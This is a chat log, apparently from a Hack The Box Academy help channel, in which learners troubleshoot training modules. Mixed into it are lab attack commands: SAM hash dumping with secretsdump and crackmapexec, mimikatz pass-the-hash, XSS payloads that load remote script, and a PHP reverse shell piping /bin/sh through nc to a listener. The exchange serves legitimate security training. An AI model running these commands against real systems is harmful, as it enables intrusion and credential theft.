#modules

i'm guessing something is wrong with the files

not sure where you got those files from as you didn't really include any info, but i would make sure you obtained them correctly. if you just randomly found them somewhere they may not be useful.

https://cdn.discordapp.com/attachments/774040263278592041/1232328734464540763/image.png?ex=66290f11&is=6627bd91&hm=7bd5b1407a558f3d61810891173e1ce0c09a7c56be6bcfc9aeab82d9782fb237&

this is my error

I did what the course said.

did you solve this

is that in a console where the user has elevated privs?

try to check the md5sum to see if the files are transfered correctly

how can I check it

in linux md5sum sam.save

Have you tried simply dumping sam remotely?

[★]$ md5sum sam.save
6808a99b9a7d854d099fa82530bd0377 sam.save

in windows Get-FileHash <filepath> -Algorithm MD5

then compare them

ig he don't have creds , just shell on the machine

with a system shell he can simply add himself a user and add them to admin group

I have followed all the steps
I also check files are transferred correctly

what user is your shell running as

but this commad is not working
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

the question itself also provides creds

From what i remember the module gives rdp session that has admin rights, i did that a few days ago and had 0 problems

depends on the situation

yeah he has the user bob

try CME

try impacket-secretsdump ..........................................................

okay let me try

After move, the file is gone from the target machine, and you can't check the md5.

copy instead of moving

why ?

So he can check md5

if it didn't work try netexec try --sam but you need creds for that

the module gives him the creds

$ locate impacket-secretsdump.py
locate: warning: database ‘/var/cache/locate/locatedb’ is more than 8 days old (actual age is 355.4 days)
┌─[us-academy-3]─[10.10.14.211]─[htb-ac-1120979@htb-6e3z9bl4q8]─[~]
└──╼ [★]$

Are we sure he is in the correct directory where all 3 files are?

just impacket-secretsdump

okay

without .py ,you don't need the absolute path

[★]$ python3 /usr/bin/impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
File "/usr/bin/impacket-secretsdump", line 3
name_script=$(basename $0)
^
SyntaxError: invalid syntax

don't use python, impacket-secretsdupmp is a binary itself

impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

only this

[★]$ impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.12.0.dev1+20240418.131633.ea96b63a - Copyright 2023 Fortra

[-] read length must be non-negative or -1
[*] Cleaning up...

your files are corrupted

something is up with the files

ooh

use netexec or re-do it from scratch

okay i will re-do it

Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local .

https://academy.hackthebox.com/module/218/section/2389

what exactly shld i fix ??

wtf?

Delete the ones on your system

Then retry

This is from "Web Requests" "GET" section, is this excercise broken? (I put asterisks to not reveal the flag)

try removing the flag: portion and just put the flag in there

..... I'm amazed at how much of a dumbass I can be sometimes lmfaoooo, thank you

I'd like to know what your ping is.

Damn it,it's always the same problem.

"NTLM RELAY ATTACKS", Skill Assessment: I am currently stuck on Question 3 and could use some nudge. I will share what I have tried so far.

right?

even though I am putting credentials in a login.php form ...it's capturing a GET request, not a POST request

Hi all. I'm working on "Attacking Web Applications with Ffuf" -> Skills assessment. Is there someone I could DM with to check my work?

login pages need not require a POST request to submit login data

yes

it will obviously depend on the web server

some do GET requests, others do POST

I don't know why I can't get this file to come through, but the other two do.

try \\10.10.15.149\share\system.save

┌─[us-academy-3]─[10.10.14.211]─[htb-ac-1120979@htb-iffg1lknpl]─[~]
└──╼ [★]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[-] read length must be non-negative or -1
[*] Cleaning up...

again same error

no idea , dump it remotley using netexec

how to do it pls explain

crackmapexec smb ip -u user -p password --sam

read length must be non-negative or -1 your files got messed up somewhere

are user pass same as given for rdp

yes

Anyone available to assist with the Command Injection Bypassing Blacklisted Commands module?

what to do after this?

nothing it should done the job

it just

] Initializing SMB protocol database
[] Copying default configuration file
[*] Generating SSL certificate

what would its result?

read the section again , you are lost

first run initilaise things, run it again

hello #academy-announcements

new spot to share small updates about new modules n stuff

can't wait to see what's been cooking

My issue was with syntax, figured it out.

👀

anyone else's target systems not spawning?

still beta tho

no

shit

oh there we go it just spawned

I got it and found the answer
thanks for your help

hey is windows powershell harder than bash because it seems way harder than bash

maybe that's just because i have more experience with bash but idk

yeah i guess i meant intuitive

it seems simpler

Hello! I am trying to do the aritmetic intructions section of the assembly module but I get this error

any ideas... the assembler runs fine with other .s fules

Take out the subdomain

...

I feel like there's something missing

Ah because both of those are wrong

It's not cto

Read the emails more carefully

You won't get there with whois queries.

Hi again, anyone completed recenlty the intro to assemble language module_!

I cant assemble the files I am supposed to... I follow the module instructions but its not working

It happens

to be more precise the sender is CTO; but that's not their email

the infosec foundations path is kinda in a weird order
intro to bash scripting comes before web requests but web requests is listed as a prerequisite for intro to bash scripting

guess i'll do intro to networking next

Anyone working in the intro to assembly language?

Answering to myself: I think I solved this one.

give more info

oh come on don't be that guy

when I run the file provided I get this as response

I cant follow the module guidelines

which section

maybe check out pwnedlabs

I did that module, aside from the skills assessment, I still can't figure that out. But I struggled with that whole module! @next bronze was very helpful!

Yes... it is quite challenging...

And for some reason I have not figure out why I cant follow the module examples...

I had the same problem on a lot of that course, I could run the same stuff as the examples, but it would show different memory addresses.

Do you remember how did you solve the arithmetics instructions module?!

I try to assemble the file provided but it does not work...

I can look in a bit, that is on my linux box, this is my work computer, I will take a look when I can (probably an hour or so).

Ok! thanks a lot.... I will keep trying different things

feel free to dm me as well, if you would like.

is your assembler script correct? try just assemble into elf and not feed it into gdb directly

im stuck at attacking coldfusion i managed to gain a shell but the question asks for the user the coldfusion is running as so i typed whoami and hostname then submitted them and got wrong answer any hints?

I have tried without the assembler and I get the segmentation fault error

And when I use the assembler I get this error

the segmantation fault is because you need to exit the program properly (they explain that in the syscall section)

even tho you should get your answer you done it correctly

exit the program?? I started a new pawned machine several times and even at the first attempt I get a segmentation fault

this is the file

no you should call the exits syscall when you finish (just read the syscall section )

Ohhh I think I get it

even that ur program crash , you should get your answer (in this case )

I am readin through the sections again

... you can't just do syscall without setting up the registers first

but you don't need to do that for this question

.

I am trying to follow what the question says...

I'm talking about the syscall at the end, that's not needed and not how you use it

why you feed it to gdb in the first place ?

I dont know... I wanted to see it before trying to execute it...

I will try to execute... I get segmentation fault

you don't need to worry about segfault now , if your code is write you'll get your answer

what's the difference between -contains, -equal, and -match?

i mean...it's kinda explained right there

ok so -contains doesn't have to be case sensitive

but what about -equal and -match i don't really get the difference

-match is regex

ummmmmm

-equal is not

so there is no need to execute or to debug??

ok thanks

I cant do either since I get the segmentation fault error

it's simple , write the code , assemble it , execute it , get the answer

im doing the Attacking Common Applications section Application Discovery & Enumeration, i cant seem to find the header from opening the aquatone_report.html

im prolly blind af but i cant find it

Hmm

Read the page source i think

Does anyone know which module covers the "TRACK" verb for HTTP in the pentester's path? The web attacks module claims there are 9 verbs , with a link (https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods) to here showing them, and none of them are "TRACK".

theres alot of headers in the page source lol

I can't remember where exactly you can find it

I assemble and execute but I get nothing... the file has already the xor rbx 15

then you doing something wrong

many things wrong haha thats for sure 😦 😦

this is the code...

T-T

don't you need to run it through gdb, how are you gonna see rbx

I just check the question

I was wrong

he need to run it on gdb

yeah just run through it and look at $rbx

What is the hex value of 'rbx' at the end?

and see the value of rbx at the end of execution

since that is the question... I assume I must do something else

@arctic sentinel sorry for the misleading infos

no worries! everyones help is really appreciated

but I cant execute... I get nothing as answer

don't set breakpoints on gdb just run it check the registers at the end

It's something obvious. 🙂

I get the segmentation fault if I try to run it

I placed the syscall at the end but does not solve it

and the syscall sections is like 5 sections ahead...

I am also trying to follow chatgpt instructions 😦

as I've said, you don't need to use syscall. run it through gdb step by step

just run it , and check the rbx

5 sections ahead...

just do what's explicitly in that section

do you see something like this ?

I get this when I run it

are you using the GEF ?

also did you break at the start?

I didn't and I got the answer

hm it should show the registers even if segfault

now I get something!

just read the rbx

I cant do steps...

ohhhh yeah yeah!! got it!!

thanks!!!!

gg

you don't actually need to run anything btw, just look at the code, xor 15 with 15 gets you what?

0

Hi everyone just had a question, im on the Information security foundations Setting up module section installing additional tools. just wondering if this is required on the new parrot os

if the required tools aren't installed, you should install them

this is how im typing in the command sudo apt install netcat ncat nmap wireshark tcpdump ...SNIP... git vim tmux -y

do not include ...SNIP... in the command. include all tools that you need

don't just copy and paste the commands

you can create a list and have apt read from a list btw

aren't those included by default in parrot?

that too but that's kind of a later issue

that SNIP is just to not clog the area up with text

they should be

a lot of the tools though are installed by default in parrot

ahhh okay, thats what i was wondering

i would be horrified if parrot doesn't include nmap

they are, i think the example was shown on an older version of parrot

some of the more niche tools require some level of install via source

they teach you how to get tools by yourself

likely 4.x or 5.x

it's not about parrot

thats what i had figured also

more than likely 4.x

apt get urmom

¯_(ツ)_/¯

apt purge @next bronzemom's

not enough space on disk to install

u for got sudo

don't mind him just a skid

i was just about to make this joke

lol thanks everyone

hello guys in the double pivoting section of the pivoting module, did anyone face problems when trying to connect proxifier to 127.0.0.1:1080 ?

I followed the module and had no problems

what method did you use for the ptunnel section instead?

just one of the other shown methods

¯_(ツ)_/¯

i tried a handful that just arent working but ill try a few more

i mean the other thing for ptunnel is compiling it statically

but i just didn't care enough to do it ¯_(ツ)_/¯

me neither also idk how to do that

i remember having this exact issue with chisel but i managed to get it to work a different way

when I set up a proxy server on 1080 shouldnt mstsc's traffic be routed on it by default ?

depends on how you set it up. 1080 is a common default port for SOCKS proxies

is there anyone who can help me with a module, i requested it through the Academy, but i used it before but eventually didn't get to speak to anyone

just pose your question along with the module/section

Thanks you, Im in the module, Command Injections, within section Indetifying Filters, i identified the method, but it is not accepting my answer, i tried all injections, only one injection identifies but i cannot seem to give the right answer

You can DM me what you're trying if you want and I'll take a look

thanks

extremely specific question, in powershell when you're using a command like where, what's the difference between, for example, where Name -like '*.cfg' and where {($_.Name -like "*.cfg")} because they both give the same output but this htb module just brought up the part with the curly brackets and the dollar sign and whatnot without explaining it

$_ is for each

oh if you're doing multiple filters?

something like that, yeah

i see

thanks

thanks @cloud urchin great help

I don't see an example of mimikatz extracting hashes in the section the following question was asked in:

Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?

Is there a way to dump the NTLM hashes? Am I missing something?

Never mind, got it.

mimikatz # lsadump::sam

Coincidence @valid viper working on the same module as me at about the same time. Pass-the-Hash module and the last question to get the flag off DC01 using a reverse shell. Used mimikatz w/ julio's hash to get a powershell session. Have a listener going. Have all the right info in the reverse shell command and am not getting a shell on the listener. Happy to DM w/ someone if they can help...would greatly appreciate it!

Any one help me module injection attacks part skill ass

Are you operating your Linux box in a VM or on bare metal?

bare metal but that's not my particular issue

Is your firewall enabled?

well that wouldn't be an issue on my box but i guess i can check the firewall on my RDP session

Well, if you have ufw or iptables up and running...

That can interfere with catching a shell.

the listener is on a windows machine that i'm RDP'd into so the connection is local between DC01 and MS01 which is the machine i'm logged into and have run the mimikatz commands. 443 is also allowed in which is one of the ports I've tried with the shell

You're using port 443...?

i've tried several ports for fun, I don't believe the ports are the issue

Port 443 is HTTPS.

That's an interesting way to pop shell...

From the lesson I mean.

yeah i used 8001 as well

Your scenario sounds really weird. Why are you trying to get a reverse shell from DC01 if you already have command execution on DC01?

i'm on MS01, trying to get a reverse shell from DC01

what privs do you have on DC01?

and how are you connected to DC01?

connected to MS01 not DC01

ok well if you want a reverse shell from dc01, you'll need to be able to execute commands on dc01

can you do that?

i'm attempting to use invoke-the-hash for the reverse shell, so really i should be using the hash to get the connection from windows-to-windows or I guess I can look into cracking the hash and then doing an RDP session from MS01 to DC01. Not really party of the module but doesn't matter as long as I get there I guess lol

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

that's it

what module and section

So you're catching the shell remotely via nc.exe (netcat), do you have that running?

Password Attacks - Pass the Hash

^

And you have nc.exe running?

yes

What Powershell command are you using to try to pop the shell?

Are you using Julio's username + hash?

Not really sure that we can post full commands in here as it could be spoilers? Anyway, I'm invoking WMIEXEC -target <target IP> -domain inlanefreight.htb -username julio -hash <hash> -command "powershell -e <insert shell from revshells>"

well that's wrong

There's the problem.

it's Invoke-WMIExec

-Target DC01

yeah

i have all that

that's not what you showed us though

Try inlanefreight.local

you can DM me a screenshot of your command if you want

C:\tools\mimikatz.exe privilege::debug “sekurlsa::pth /user:david /rc4:NTLM|HASH /domain:inlanefreight.local /run:cmd.exe”

inlanefreight.local worked for mois

this one is inlanefreight.htb

Oh interesting.

so the particular issue with this was after running import-module .\invoke-thehash.psd1....my next command began with " .\Invoke-WMIExec " when it appears it should just have been "Invoke-WMIExec" thanks @cloud urchin for clearing that up...should've tried that before

Why do I have to put a + in the command for php shell for ls -la in this example?

I tried it without the + and it returned blank

The module doesn't explain this

I'm working on the Shells and payloads module and i'm on the infiltrating windows section. The system is vulnerable to Eternalblue and my auxiliary shell even confirmed it, but all of the eternalblue scripts fail to create a session. What should I do?

Its url encoded, + is a space sometimes it can be %20 aswell

So the cmd is ls -la

There are multiple different versions of EternalBlue. Have you tried them all?

Yes, I searched them on Metasploit like the module said, and used all the options available

all of the options or all of the modules?

Well now that I think about it, I didnt try msfvenom yet

I dont remember which section it was but had trouble with eternalblue aswell. But then randomly it worked

Like you just kept trying the exploit and it just worked?

Idk i went out of msfconsole and back in set the correct ips again and it worked

I tried multiple eternalblues there

And then it randomly went through

But i cant find my notes about it

Okay bet

yeah, you have to use the correct one

you said you tried them all though

in which case it's probably your payload

You guys set the LHOST as your machine IP right?

yeah tun0

it's very likely you just didn't use the right module

LHOST is usually tun0; unless in cases where you're pivoting then it's whatever interface is connecting to the target

Okay, I had it set to my main IP, I switched it to tun0 and am retrying..

maybe that was the issue

Fk my obsidian notes got mixed up.... Holy f

Shells n payloads live engagment write is now john the ripper i guess💀

all my notes for the skill assessments are using the Canvas Feature

finally it worked

Yea great imma have a great sleep now, knowing some of my notes are gone

thank you guys\

😭

just re-read it

and girls^

Well writeups are gone, not notes

Which is worse

Why am I getting blank values on the SQLMap Skills Assessment

tried
sqlmap -r req.txt --banner --current-user --current-db --is-dba --no-cast
with and without --no-cast

I just need to find out what database I'm in, but SQLMap is not working.

It's not in the logs either, but the logs do have some information hinting that it might be a time-based technique needed, unfortunately I'm not to that point yet, since I don't have the database

The "retrieved: " section is blank, there should be some kind of output there

Anyone have a similar issue?

Check DMs 🙂

for Session Hijacking inside the Cross-Site Scripting (XSS) module.

I'm having a hard time finding the vulnerable parameter. I've put each of these payloads in each parameter (Except email) and I don't get a call back to my http server.

<script src=http://10.10.14.117/test</script>
‘><script src=http://10.10.14.117/test></script>
“><script src=http://10.10.14.117/test></script>

What else can I try? Thanks for the assist

you need to have some kind of javascript payload

Finally got passed the VHD mounting, was always the better option to mount it in another Win VM and unlock it 👍 thanks for the help anyway

¯_(ツ)_/¯

after completing module if not satisfied or need more exp in that module what should i do

don't have htb main sub yet

htb won't have any box specfic for any module right it will be mix of many modules thats why i stuck there

If there's a specific subject / module you want to get more experience on, there are many boxes on HTB that could cross over with what you're looking to learn. Many retired machines, covering many subjects, but many of the retired machines would require a subscription. Check out https://ippsec.rocks/?# - he has a lot of good video walkthroughs on retired machines, showing process, tooling and mindset

Watching his videos of course does not require a subscription, but if you wanted to play the machines, it would

hey @goblin is your name james coz i saw htb channel in telegram with your username

Many modules also have more advanced versions of them, taking it to the next level.

Yes it is, and you tagged the wrong person 😅

hey guys, can I get a help on skills assessment: website (bruteforcing) first question. I’ve already captured the flag on the 2nd question, but I have no idea where to find or capture the flag on the 1st question

thats i can do , thx for some advice

try with --output-file ./oracle_db.odat.save

Wit this was a month ago

Wot

Ty for help

oh rip.. why tf is there just a time and not a date lmao

sorry.. just ran into the same error myself 🤣 this doesnt even work for some reason i had to run as sudo

I can’t save bash script with nano! Can someone help? I’m on intro to bash scripting

whats the error? i got lost

lol i saw that

😂

😛

Do you lack permissions to save to the directory you're in? CTRL+X, Y, enter

Include the issue you're facing 😉

anyone here finished the password attacks module?

no one

👍

@wary tendon I don't do random dms

Just ask your question here or utilize discord search to see if your q has been answered

Now that you've done it in Windows, give it another honest go in Linux

I'll pass for now

hey by any chance could you help me on a module im stuck and am like not sure im understanding this example
[10:48 PM]
i could share my screen with you
[10:49 PM]
its in the tomcat enumeration and discovery chapert of attacking common applications

but thanks

Give it some time

I'd rather progress the material since that's not totally important right now

I'm not sure what you mean by this. I've also tried <img src='x' onerror='var d=document; var s=d.createElement("script"); s.src="http://10.10.x.x/xss.js"; d.body.appendChild(s);'>

I even do : sudo nano flag.sh

It works on iPad just not my Linux laptop it just doesn’t work in any instance on HTB. It prints X on bash script and then I can’t exit either

Yeah, what’s up?

did anyone else have trouble with the footprinting dns module and if so how did you come to understand it

Any specific issue @gilded ice? Feel free to DM

anyone online to help with the HTTP Attacks -> HTTP Response Splitting section question?

What exactly is not working?

I have the payload working I believe. Tested it in my own browser with document.domain instead of document.cookie as a PoC. Just having trouble delivering it it seems

The encoding seems right since it looks good in the log file, but not getting any hits from the admin user

have you read the hint?

yes, tried localhost instead of the public IP if that's what you're referring too

|| Certain special characters need to be URL encoded multiple times. There is a firewall in place that prevents the admin user from accessing any external endpoints!||

tried common HTTP ports as well

with localhost^

Send me your request as a DM and I'll try to push you onto the right path. Without seeing exactly what you are doing, this is very difficult

you can use the one they used ans just change some stuff like the ip and port no need to go off script

I did try the example in the module, but I didn't get a call back.

ima go to sleep rn ill help when im awake just send what u tried and ill help in ghe morning

Thanks. I'll dm you if I'm still having problems. Goodnight! 🙂

hey guys
when I connect sudo openvpn to my VM and then ssh to Target IP it got disconnected after 2-3 minutes
why is this error am I facing?

You likely are connected from multiple places, e.g. on a Pwnbox and your own local VM. If you're not using the Pwnbox, run killall openvpn, or just reboot the machine you are connecting from.

Essentially multiple connections will "fight" against each other for the connection, as VPN connections to HTB labs as not multi-tenant, e.g. only one person can utilise the VPN connection to the labs at one time.

ooh got it

MODULE: Whitebox Attacks
SECTION: Client-Side Prototype Pollution

I'm really struggling with manifesting the attack chain in the exercise. After examining the /admin.php page contents, I thought that I was meant to forcefully have the victim promote my account, but my payload(s) haven't worked. Am I in the right ballpark?

Can I dm?

Hello man, can you help me please with an attack wordpress : https://academy.hackthebox.com/module/113/section/1208 Where is my error?

error message :

and I listen with nc -lvnp 5555

You are using both? Nc -lvnp and metasploit? And both are at 5555? Yea doesmt work, adress in use

I have, what do you need?? 🙂

yes I am very idiot

thanks

Now I have this do you have an idea ??

Double check if you have the correvt IPs. I havent done the module but looks like something is wrongly set

Anyone working on the Intro to assemble language module?!

isn't blog.inlanefreight.local specified as vHosts at the end to be used for answering the questions?

Hey. Have somoune passed "PIVOTING, TUNNELING, AND PORT FORWARDING"?

If you had to guess, do you think anyone has completed the module?

Currently working skills assessment for intor to Digital Forensics and I completed all questions but the third one asking about the registry key used for persistance. I am pretty sure i found it but not sure why its not taking. is there a specific format it wants?

Full format version (path + key value)
For example: HKEY_CURRENT_USER instead of HKCU

yes, and for sure I'm not the only one here. If you want you can let us know what problem, in case, you're having

working on the file inclusion skills assessment, I'm super close I can feel it, probably just need to use traversal.

I'm 60% there, this one really uses all the module!

Hello guys,

Which command should I use to see only the scan result to see these details in my search?

proxychains -q will squelch errors

I can't see what level my scan is at this time

then be patient, you have no verbosity set on the nmap command so you're not going to see anything until it's done

oky thanks

you can add -v or -vv to the nmap command and see results right away

or not results, but what it's doing rather

i believe you can also do --stats-every=5s as an nmap argument too

oh oky thx

i have question

pivot module - dynamic port forward socks tuneling..

first question - You have successfully captured credentials to an external facing Web Server. Connect to the target and list the network interfaces. How many network interfaces does the target web server have? (Including the loopback interface)

'i dont understand this question

How can I open the web page on the pivoted machine from my own browser?

Hey everyone, question. For the Footprinting Module, SMTP section; where is this allegedly provided “footprinting-wordlist”?

resources ?

…ive gone through 6 other entire modules and never knew this was a place/thing 🤣 ty!

I can't MSG this here but why can't I MSG in general channel

Read #welcome - you need to verify your HTB account

How are you tunneling? Chisel?

God why is rdp such a pain on academy

Lately

proxychains

proxychains isn't a tunnel, but if you're using that just type 'proxychains' before your command. like 'proxychains firefox'

yea im try but not working

Lately? It's been a pain as far back as I can remember. Some were better than others but still a pain.

You're going to have to include more information, simply stating "it's not working" doesn't help us help you. That's like me saying "just make it work then"

true sorry

my target machine(ubuntu) -> 10.129.247.120
my pivot machine (windows) -> 172.16.5.19

https://academy.hackthebox.com/module/158/section/1426

pivot machine ports (windows)

if proxychains worked for nmap, it should work with any other program

when you type 'proxychains -q firefox' does firefox open?

yes

I couldn't see the page

should work then. are you sure you have the right port? did you try both http and https?

oh work

just had to wait patiently

morning everyone, i'm doing the first skill assessment on Attacking Common Applications. i'm having issues running the Poc

can i dm someone for help

no rev shell not sure why

Try to help, no reply, sadj

Goblin got banned

I read your reply and it was interesting

Thanks

Removed them myself

The exploit your using is not correct, must be modified

so correct exploit but i need to modified the script, or i need to use a different exploit

that CVE is correct, the script must be modified. You've to do a bit of enumeration since you didn't find the correct endpoint to exploit. Then you can either modify the script or use something else to automate the task.

ok thanks

isn't the endpoint to exploit cmd.bat ?

for you to find out

Anyone can give me a nudge on the skills assessment for the module "NTLM RELAY ATTACKS"?

I might need some help on** Section: Whitelist Filters, Module: File Upload Attacks. Question: The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt" **I have found extensions that allow me to successfully upload the php webshell to system. However, when I send a GET request to /profile_images/{file_name}?cmd=id, it will return 404.

sounds like you're not calling to the right location/filename to me

can someoone help me with this one
module SQLMAP ESSENTIALS (Attack Tuning)
hint (Try to count the number of columns in the page output, and specify them for sqlmap.)

mmm because of the way the file extension was used, let's say the filename that was successfully "intruded" contains /x00 (null byte), when I call it by /profile_images/{file_name}, its not the same

because the browser kinda removes the /x00 when it saves the file at the /profile_images endpoint if you get what I mean

that changes nothing about my answer. when you call to it the server gives a 404 error. 404 means the file cannot be found. which means when you're curling you are either pointing to the wrong file path or file name.

hmmm ok ill rethink about that

i was able to complete the entire module without null bytes

what about it are u stuck

what is the command how to use the UNION query -based tech

(Try to count the number of columns in the page output, and specify them for sqlmap )
how to do this exactly

if you read the last part it would tell you the answer on how to perform it, ```UNION SQLi Tuning

In some cases, UNION SQLi payloads require extra user-provided information to work. If we can manually find the exact number of columns of the vulnerable SQL query, we can provide this number to SQLMap with the option --union-cols (e.g. --union-cols=17).```

great how can i know the number of colums

for the nibbles foothold what does the port need to be for netcat?

Getting Started - Initial Foothold

You should take the SQLI Fundamentals course, it will teach you everything about this.

did you skip the sqli fundimentals?

LOLL we said the same thing

Catching the shell? You need same as in the command then

i did but my brain is on fire

i recommend taking the sqli fundamentals itll make your life easier but just count the columns you see on the web page

i did

but i kinda lost here how to know the number of colums without being in the database and only from sqlmap

uh bro you dont need to be in the database to know the columns, its right infront of you on the webpage

did you take notes about how UNON sqli works

aha so its a 5 ?

🤷‍♂️

go try and see

sqlmap -u "http://----" --level=5 --risk=3 --dump --batch -T flag5 --union-cols=5 ?

try and see i dont exatcly remember the commands i used

it worked like this
sqlmap -u "http://94.237.63.8627/case7.php?id=1" --level=5 --risk=3 --dump --batch
without any UNION stuff

i believe its bc of the level and risk lol

i tried it rn and i did it without the level and risk and did the union and it worked

can u show me the command

you practically have it lol

Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

Need help on this task, Splunk module

the --union-cols=5 ?

just remove the level and risk and add the union and see

in IRL hunting this LEVEL and RISK are crazy right

i mean youll be noisy af lol

aha

sometimes its good to be more stealthy and cause less traffic

thanks mate

fs

So I am on Kernel Exploits in the Windows Escalation Privilege Module and I keep getting this: No such file or directory: 'SYSTEM-2021-08-09' when I try to run impacket-secretsdump after I have ran HiveNightmare.exe on the host machine. I'm literally staring at it right now. Here is my command sudo impacket-secretsdump -sam SAM-2021-08-09 -security SECURITY-2021-08-09 -system SYSTEM-2021-08-09 local. (Have tried with the target IP at the end as well, just tells me Access Denied).

well, if the file is not found you're not putting the right file name in. try starting the file name and pressting tab to auto-complete it

?

sorry what

You mean this? nc -lvnp port?

so it's 9443?

Its whatever port you make it, as long as its open for outbound traffic on the target

Depends on your reverse shell. If you just pasted the one in the guide then yes.

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

6667252213360106

but the ip for the website isn't that

well for me anyways

Well ofc it isnt. But it was the IP for the one who wrote that guide. So for you its gonna be different IP
And if you want you can change the port aswell to a random one thats not being used, example 9001. You will need to change the nc -lvnp 9001 aswell then

I set the ip to domain in the host file, am on windows. but I can't still access the domain.

Hello, hello, I got two questions.

1. Why when I do a PtH attack, mimikatz doesn't log me in as the attacked user, rather gives me a "session in the context of the user"? This idea of a context doesn't sit well in my brain.
2. What is the difference between a PtT and overpass the hash attack? I mean more in a sense of when would I choose one over the other - they seem very similar for me

Did you do it as
ip domain
?

yess

so annoying it doesn't work. probably would work on linux when it is in the /etc/hosts

but should work on windows aswell 🤔

The hash uses a user's ntlm hash, whereas PTT uses the ticket generated from krbtgt service (basic explanation)

Well windows is in like C:/windows/system32/drivers/etc/hosts

yes I did it there

Second: your windows machine would need to be connected to the vpn

I am.

it's just this part of the box that I have problem with

Can you ping the ip?

yes

Is this for an academy module or a box

Okay, so they both give me the same result of lateral movement (if successful) but depending on what I find in the environment I can go with the first or the latter

it's the starting thing

If it's for a box then you'll need to verify your account following #welcome and ask in #boxes

Starting-point? That's part of the main labs site

See above and ask in #starting-point

yes that

no access

Then you should read and follow #welcome

:)

thought so. thanks

fk that's a lot of work. I just wanted to practice in htb.

It takes like 5 seconds to do

Lol

Also fwiw http://domain in the browser

I don't recommend using windows though for htb

Stick to linux/a linux vm

I was using wsl2

hehe

Wsl sucks

wtf

is it common people use a linux vm for htb

Also you gotta go through a bunch of extra setup for wsl

where the food

Yes

Kali and Parrot are the most common

which u recommend

I prefer Parrot because less bloated software on install, but Kali is alright

try them both and see what you prefer ¯_(ツ)_/¯

you right thanks for the info. it comes preinstalled with tools I need. like johntheripper, I have to use that in this lab

Yes a lot of tools are already preinstalled

in the file upload skill assesment am i going the right by using svg

Hello everyone! I am doing the unconditional branching in the assembly language module!

I am stuck in here... Try to jump to "func" before "loop loop". What is the hex value of "rbx" at the end?... I modified the file provided and run the program till the end and I get 0x100000000 as rbx but its not the right answer....

I also tried the same value since I think the loop never happens...

I got my answer

https://tenor.com/view/happy-dancing-celebrate-excited-gif-14044630450323771390

https://tenor.com/view/fresh-from-the-bath-cute-dog-fresh-just-finished-bathing-after-shower-gif-18358684

does anybody else's target box terminate prematurely ?

Was it up for a longer timr without refreshing the window?

last time it did it was up for like 20 mins

Hey guys I'm new to entering coding world so i want someone to help me

Ah then no

the channel you seek is #programming you should visit #welcome and register your account

Ok

Anyone has done the unconditional branching module??

Guys I know the log for this question however is not accepting it

Modify and employ the Splunk search provided at the "Detecting Kerberoasting - SPN Querying" part of this section on all ingested data (All time). Enter the name of the user who initiated the process that executed an LDAP query containing the "(&(samAccountType=805306368)(servicePrincipalName=)*" string at 2023-07-26 16:42:44 as your answer. Answer format: CORP_

This is not CORP\+user ?

Module Footprinting. Section IMAP/POP. Question: What is the admin email address? Is it asking the admin email address for the POP or IMAP service?

Pop/imap is the same

It's the overall mailservice and it will be the same

Once you log in and retrieve the mail, you should see it

thx

Note the 1 fetch <id> all command only collects info about the message, not the contents, so you may see a bunch of NIL

#modules message

A link to a couple comprehensive articles re: imap

anyone know how to fix there is no available instances please try later T-T

Change vpn region

thanks i was reading those earlier 🙂

what is the deal with having to precede imap commands with what seems like a random character or string

It's like an identifier, basically

like a login

But tbh that's just the way it is

but it identifies nothing? it's just what the server expects

protocol idiosyncracies

might be idiosyncrasies

It can be set up to where depending on the source (i.e. an email client) it identifies how it was accessed

Also keep in mind, these protocols are ancient

yep thanks

Also I suggest playing with the body[] query

I.e. 1 fetch 1 body[header] iirc

\noselect flaags mean the folder cannot be selected i assume

indicating it's not a "real" folder?

Perhaps

As you likely saw when you listed theres a drill down to a specific one also it's case sensitive

So "dev" isn't the same as "DEV"

It's one of the few things within imap that is case sensitive

good hint

I also suggest doing it with pop3s just to get practice with it :)

I like imap(s) purely because it's organized

mmm

their fun protocols

smtp also

telnet port 25... send some unsolicited mail 🙂

Smtp just facilitates communication

yeah the glue

of mail

Hi I am in attacking common applications I am looking at the modified manifest file which gives the correct path to the starter classbut I am still getting this error. I even tried double checking it by decompiling the new jar file

Did you still need to reach me?

hmmmm i'm reading the article on pop and i think it is saying you can only access the inbox?

Nope

You can access any available mailbox

ok, but there doesn't seem to be a list or dir command

1 select <mailbox>

1 list

that's imap commands

i got that to work on the imap service

Oh

but i'm trying to retrieve the mail on pop3 service

Pop3 doesn't have an organization structure

list shows the mail and ids

Then retr <id>

ok, the pop service reports 0 messages, so not sure it sees all folders

Weird it should see the email

I take it you're logged into the pop3s yeah?

list +OK 0 messages:

yeah logged in and authenticated

Sec

+OK Logged in. list +OK 0 messages:

the question does say specifically to read it from the imap service so getting there is a difference

It could be that it's only available on imap

I might have been thinking of another module/skill assessment

Usually it should be available to read on both

pop3 could be pointing to a different mail server entirely, or it may not have downloaded from the server yet

they are different protocols and both manage email differently

if you see both running on a server you should check both

In this case I think it's a case of pointing somewhere different, purposefully

The question explicitly states reading email with IMAP

it could also mean that the pop3 client simply hasn't downloaded the email yet

This is a spoiler dude

I suggest deleting it

